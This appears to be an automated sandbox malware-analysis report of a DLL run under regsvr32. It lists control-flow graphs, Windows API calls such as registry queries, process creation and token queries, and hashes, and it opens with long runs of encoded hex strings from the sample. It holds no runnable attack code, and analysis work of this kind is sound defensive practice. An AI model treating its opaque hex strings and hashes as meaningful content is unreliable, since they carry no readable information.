8566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db$ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62$ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1$af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a$b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a$b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb$b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c$b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed$b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290$ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1$bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64$bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee$bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147$bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e$bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1$bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af$bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697$c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1$c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494$c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef$c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb$c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae$c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2$c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909$ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43$ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c24e5cbf5464cd461da$cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee$cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d$cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0$d29f33018596af56885209a0391cf43d81722440b5$d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce$d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4$d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983$d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7$d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd$d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee$d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57$d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3$d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea$dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1$dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581$dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb$e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c$e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0$e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f$e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b$ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef$eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae$ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0$ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3$f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312$f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89$f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5$f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e$f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7$f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a$f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700$fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2$fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df$ff37083708963434836f8f0c252e8680adff9bc9a0451464a4
                                                                                                                • API String ID: 1162954093-2434349084
                                                                                                                • Opcode ID: a3a97de673c30ce842b389a006a58d2de34aef8cec0daa8f32a107c186fd641b
                                                                                                                • Instruction ID: a15bc2b9cc70d4b7527d4588e6e13188aa3172f9c2fa9507c093c1b5d2cd388d
                                                                                                                • Opcode Fuzzy Hash: a3a97de673c30ce842b389a006a58d2de34aef8cec0daa8f32a107c186fd641b
                                                                                                                • Instruction Fuzzy Hash: 41B35FA1F05602A6FA00EBE5D455BEC6360BF45784FC81439D91FE67AAEEACB54CC340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3197 7ff983d02610-7ff983d02675 call 7ff983d081a0 call 7ff983d1b330 3202 7ff983d02677 3197->3202 3203 7ff983d0267a-7ff983d026aa 3197->3203 3202->3203 3205 7ff983d026e2-7ff983d026fa 3203->3205 3206 7ff983d026ac-7ff983d026c2 3203->3206 3209 7ff983d02732-7ff983d02735 3205->3209 3210 7ff983d026fc-7ff983d02712 3205->3210 3207 7ff983d026c4-7ff983d026d7 3206->3207 3208 7ff983d026dd call 7ff983d295b0 3206->3208 3207->3208 3213 7ff983d0297c-7ff983d02981 call 7ff983d2e0ec 3207->3213 3208->3205 3211 7ff983d0294d call 7ff983d53098 3209->3211 3212 7ff983d0273b-7ff983d02781 call 7ff983d081a0 call 7ff983d1b330 3209->3212 3215 7ff983d02714-7ff983d02727 3210->3215 3216 7ff983d0272d call 7ff983d295b0 3210->3216 3223 7ff983d02953-7ff983d02975 call 7ff983d292f0 3211->3223 3233 7ff983d02786-7ff983d027b5 RegQueryValueExW 3212->3233 3234 7ff983d02783 3212->3234 3220 7ff983d02982-7ff983d02987 call 7ff983d2e0ec 3213->3220 3215->3216 3215->3220 3216->3209 3229 7ff983d02988-7ff983d0298d call 7ff983d2e0ec 3220->3229 3238 7ff983d0298e-7ff983d02993 call 7ff983d2e0ec 3229->3238 3236 7ff983d027b7-7ff983d027cd 3233->3236 3237 7ff983d027ed-7ff983d02805 3233->3237 3234->3233 3239 7ff983d027e8 call 7ff983d295b0 3236->3239 3240 7ff983d027cf-7ff983d027e2 3236->3240 3241 7ff983d02807-7ff983d0281d 3237->3241 3242 7ff983d0283d-7ff983d02877 call 7ff983d081a0 call 7ff983d1b330 3237->3242 3252 7ff983d02994-7ff983d02999 call 7ff983d2e0ec 3238->3252 3239->3237 3240->3229 3240->3239 3246 7ff983d02838 call 7ff983d295b0 3241->3246 3247 7ff983d0281f-7ff983d02832 3241->3247 3255 7ff983d0287c-7ff983d028ab RegQueryValueExW 3242->3255 3256 7ff983d02879 3242->3256 3246->3242 3247->3238 3247->3246 3258 7ff983d028e3-7ff983d028fb 3255->3258 3259 7ff983d028ad-7ff983d028c3 3255->3259 3256->3255 3262 7ff983d0292f-7ff983d02933 3258->3262 3263 7ff983d028fd-7ff983d02913 3258->3263 3260 7ff983d028c5-7ff983d028d8 3259->3260 3261 7ff983d028de call 7ff983d295b0 3259->3261 3260->3252 3260->3261 3261->3258 3264 7ff983d02935-7ff983d0293e 3262->3264 3265 7ff983d02941-7ff983d0294b RegCloseKey 3262->3265 3267 7ff983d02915-7ff983d02928 3263->3267 3268 7ff983d0292a call 7ff983d295b0 3263->3268 3264->3265 3265->3223 3267->3268 3269 7ff983d02976-7ff983d0297b call 7ff983d2e0ec 3267->3269 3268->3262 3269->3213
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441, xrefs: 00007FF983D02853
                                                                                                                • 772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712, xrefs: 00007FF983D0275D
                                                                                                                • 2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02, xrefs: 00007FF983D02651
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$QueryValue$CloseErrorLast
                                                                                                                • String ID: 2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02$6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441$772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712
                                                                                                                • API String ID: 213398537-3244201323
                                                                                                                • Opcode ID: f159dd515d2b4101636660c7e2a6403ad8ceaaba391c5dfb48b10bf237a3c925
                                                                                                                • Instruction ID: 33125437eb95a3247969d960c831fc28d21d04379ce0cebb064a1f1da0e210c3
                                                                                                                • Opcode Fuzzy Hash: f159dd515d2b4101636660c7e2a6403ad8ceaaba391c5dfb48b10bf237a3c925
                                                                                                                • Instruction Fuzzy Hash: 16A1A2B2B15A41D9EB00DFB4D4947AC2361FB44798F845239E65E93AD9DFB8E158C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CreateFile$InfoObjectPipeProcessReadSingleSizeStartupWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1192957364-0
                                                                                                                • Opcode ID: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
                                                                                                                • Instruction ID: 112b38b0475246b31f308b2657128e74615cf6db15e2a0d994036fc42ed744b9
                                                                                                                • Opcode Fuzzy Hash: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
                                                                                                                • Instruction Fuzzy Hash: A8717372A08B4186E700CFA5E8547AD77A0FB84B88F544239DA4E97B68DFBCE155C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3306 7ff983d29628-7ff983d2962e 3307 7ff983d29669-7ff983d29673 3306->3307 3308 7ff983d29630-7ff983d29633 3306->3308 3309 7ff983d29790-7ff983d297a5 3307->3309 3310 7ff983d2965d-7ff983d2969c call 7ff983d29af4 3308->3310 3311 7ff983d29635-7ff983d29638 3308->3311 3315 7ff983d297b4-7ff983d297ce call 7ff983d29988 3309->3315 3316 7ff983d297a7 3309->3316 3329 7ff983d2976a 3310->3329 3330 7ff983d296a2-7ff983d296b7 call 7ff983d29988 3310->3330 3313 7ff983d2963a-7ff983d2963d 3311->3313 3314 7ff983d29650 __scrt_dllmain_crt_thread_attach 3311->3314 3321 7ff983d29649-7ff983d2964e call 7ff983d29a38 3313->3321 3322 7ff983d2963f-7ff983d29648 3313->3322 3319 7ff983d29655-7ff983d2965c 3314->3319 3327 7ff983d297d0-7ff983d29805 call 7ff983d29ab0 call 7ff983d29f58 call 7ff983d2a118 call 7ff983d29c64 call 7ff983d29c88 call 7ff983d29ae0 3315->3327 3328 7ff983d29807-7ff983d29838 call 7ff983d29f90 3315->3328 3317 7ff983d297a9-7ff983d297b3 3316->3317 3321->3319 3327->3317 3338 7ff983d29849-7ff983d2984f 3328->3338 3339 7ff983d2983a-7ff983d29840 3328->3339 3333 7ff983d2976c-7ff983d29781 3329->3333 3341 7ff983d296bd-7ff983d296ce call 7ff983d299f8 3330->3341 3342 7ff983d29782-7ff983d2978f call 7ff983d29f90 3330->3342 3344 7ff983d29851-7ff983d2985b 3338->3344 3345 7ff983d29896-7ff983d298ac call 7ff983d27290 3338->3345 3339->3338 3343 7ff983d29842-7ff983d29844 3339->3343 3356 7ff983d2971f-7ff983d29729 call 7ff983d29c64 3341->3356 3357 7ff983d296d0-7ff983d296f4 call 7ff983d2a0dc call 7ff983d29f48 call 7ff983d29f64 call 7ff983d3fb1c 3341->3357 3342->3309 3350 7ff983d29937-7ff983d29944 3343->3350 3351 7ff983d2985d-7ff983d29865 3344->3351 3352 7ff983d29867-7ff983d29875 call 7ff983d533b0 3344->3352 3363 7ff983d298ae-7ff983d298b0 3345->3363 3364 7ff983d298e4-7ff983d298e6 3345->3364 3359 7ff983d2987b-7ff983d29883 call 7ff983d29628 3351->3359 3352->3359 3373 7ff983d2992d-7ff983d29935 3352->3373 3356->3329 3377 7ff983d2972b-7ff983d29737 call 7ff983d29f80 3356->3377 3357->3356 3409 7ff983d296f6-7ff983d296fd __scrt_dllmain_after_initialize_c 3357->3409 3375 7ff983d29888-7ff983d29890 3359->3375 3363->3364 3370 7ff983d298b2-7ff983d298d4 call 7ff983d27290 call 7ff983d29790 3363->3370 3371 7ff983d298ed-7ff983d29902 call 7ff983d29628 3364->3371 3372 7ff983d298e8-7ff983d298eb 3364->3372 3370->3364 3403 7ff983d298d6-7ff983d298de call 7ff983d533b0 3370->3403 3371->3373 3391 7ff983d29904-7ff983d2990e 3371->3391 3372->3371 3372->3373 3373->3350 3375->3345 3375->3373 3396 7ff983d29739-7ff983d29743 call 7ff983d29bcc 3377->3396 3397 7ff983d2975d-7ff983d29768 3377->3397 3393 7ff983d29919-7ff983d29929 call 7ff983d533b0 3391->3393 3394 7ff983d29910-7ff983d29917 3391->3394 3393->3373 3394->3373 3396->3397 3408 7ff983d29745-7ff983d29753 3396->3408 3397->3333 3403->3364 3408->3397 3409->3356 3410 7ff983d296ff-7ff983d2970d call 7ff983d3fab8 3409->3410 3412 7ff983d29712-7ff983d2971c 3410->3412 3412->3356
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2904100720-0
                                                                                                                • Opcode ID: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
                                                                                                                • Instruction ID: f5e7a049cefd9448c999a2347435ca0cbd68a0afb23c1ff0a14eacb63f229368
                                                                                                                • Opcode Fuzzy Hash: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
                                                                                                                • Instruction Fuzzy Hash: EB818DE1E0864286FA50DBA79441BB96290BF85780F9C403DE94FE7796DEBCF46DC600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 215268677-0
                                                                                                                • Opcode ID: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
                                                                                                                • Instruction ID: d52e92959efb792a04612e6fd66ae7a6441540c5063455fe2b2114e47470fc8f
                                                                                                                • Opcode Fuzzy Hash: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
                                                                                                                • Instruction Fuzzy Hash: 5A0156B1619641C6EB40DFA1F494A6AB3B0FF88B44F845139EA5F97654DF7CE408CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.11%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
                                                                                                                • Instruction ID: 4b79abc7dedc7df3358e4a58403ef4c44554d77326bdc44f865489261c3c6005
                                                                                                                • Opcode Fuzzy Hash: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
                                                                                                                • Instruction Fuzzy Hash: 962173E2B1468184EE11DBBAD44979C2212BB457F4F848239EA3D57BDADEB8F085C200
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.11%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3522 7ff983d495d4-7ff983d495fc GetEnvironmentStringsW 3523 7ff983d496a6 3522->3523 3524 7ff983d49602-7ff983d49609 3522->3524 3527 7ff983d496a9-7ff983d496ac 3523->3527 3525 7ff983d4960b 3524->3525 3526 7ff983d49627-7ff983d49659 call 7ff983d48030 3524->3526 3528 7ff983d4960f-7ff983d49617 3525->3528 3526->3523 3534 7ff983d4965b-7ff983d49669 call 7ff983d41df4 3526->3534 3529 7ff983d496ae-7ff983d496b1 FreeEnvironmentStringsW 3527->3529 3530 7ff983d496b7-7ff983d496d4 3527->3530 3528->3528 3532 7ff983d49619-7ff983d49625 3528->3532 3529->3530 3532->3525 3532->3526 3537 7ff983d49699 3534->3537 3538 7ff983d4966b-7ff983d4968f call 7ff983d48030 3534->3538 3539 7ff983d4969c-7ff983d496a4 call 7ff983d41db4 3537->3539 3538->3537 3543 7ff983d49691-7ff983d49697 3538->3543 3539->3527 3543->3539
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentStrings$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3328510275-0
                                                                                                                • Opcode ID: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
                                                                                                                • Instruction ID: ea0534b9dbf2a4c260e0892773b4139657da1f509e82857d6685004640f8ef1f
                                                                                                                • Opcode Fuzzy Hash: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
                                                                                                                • Instruction Fuzzy Hash: A32175A1E1879182EB24DF53A440629A6A4BB94BD0F8C4139DE8FB3B94DF7CF456C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.05%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3545 7ff983d43100-7ff983d4311b 3546 7ff983d4311e-7ff983d43147 3545->3546 3547 7ff983d43149-7ff983d4314e 3546->3547 3548 7ff983d43153-7ff983d4315c 3546->3548 3549 7ff983d431e2-7ff983d431eb 3547->3549 3550 7ff983d4315e-7ff983d43161 3548->3550 3551 7ff983d43174 3548->3551 3549->3546 3553 7ff983d431f1-7ff983d4320b 3549->3553 3554 7ff983d4316d-7ff983d43172 3550->3554 3555 7ff983d43163-7ff983d4316b 3550->3555 3552 7ff983d43179-7ff983d4318a GetStdHandle 3551->3552 3556 7ff983d4318c-7ff983d43195 GetFileType 3552->3556 3557 7ff983d43197 3552->3557 3554->3552 3555->3552 3558 7ff983d43199-7ff983d4319b 3556->3558 3557->3558 3559 7ff983d431bd-7ff983d431d5 3558->3559 3560 7ff983d4319d-7ff983d431a8 3558->3560 3559->3549 3563 7ff983d431d7-7ff983d431db 3559->3563 3561 7ff983d431aa-7ff983d431af 3560->3561 3562 7ff983d431b1-7ff983d431b4 3560->3562 3561->3549 3562->3549 3564 7ff983d431b6-7ff983d431bb 3562->3564 3563->3549 3564->3549
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleType
                                                                                                                • String ID:
                                                                                                                • API String ID: 3000768030-0
                                                                                                                • Opcode ID: e32667abee72717fedd77de28c3136e0f9cd42162783d51f0fbea799472014c0
                                                                                                                • Instruction ID: f65074ff5a507ac2358e9265a4d8aa2d302083dc2bdc061147ee069cdff11401
                                                                                                                • Opcode Fuzzy Hash: e32667abee72717fedd77de28c3136e0f9cd42162783d51f0fbea799472014c0
                                                                                                                • Instruction Fuzzy Hash: 57318262A18A4681DF64CB599450A782651FB45BA0BAC033DD76F973E0CF79F469C380
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.43%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1452528299-0
                                                                                                                • Opcode ID: 4306a561362b304f99fb02ecabc35885cb75a8ebd852e7910a124c3c3cd8dd31
                                                                                                                • Instruction ID: f1470b30c867da1ceee6bcce60f014f2ef4e013e71e1e71e3cfa4072febd4bef
                                                                                                                • Opcode Fuzzy Hash: 4306a561362b304f99fb02ecabc35885cb75a8ebd852e7910a124c3c3cd8dd31
                                                                                                                • Instruction Fuzzy Hash: 7E2150A1E0864241FB55D7E1A942B795161BF847B4F8C5B3CE83FA27D6DEACB409C600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.29%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
                                                                                                                • Instruction ID: 6e581da73de0e5477e994da857310a4140266d0006cd5b7aa216c46c597ca7a5
                                                                                                                • Opcode Fuzzy Hash: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
                                                                                                                • Instruction Fuzzy Hash: F11160B290D74286E310DB94A481A6A63A1FB44744F9D053DE68FE7792EEBCF819C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
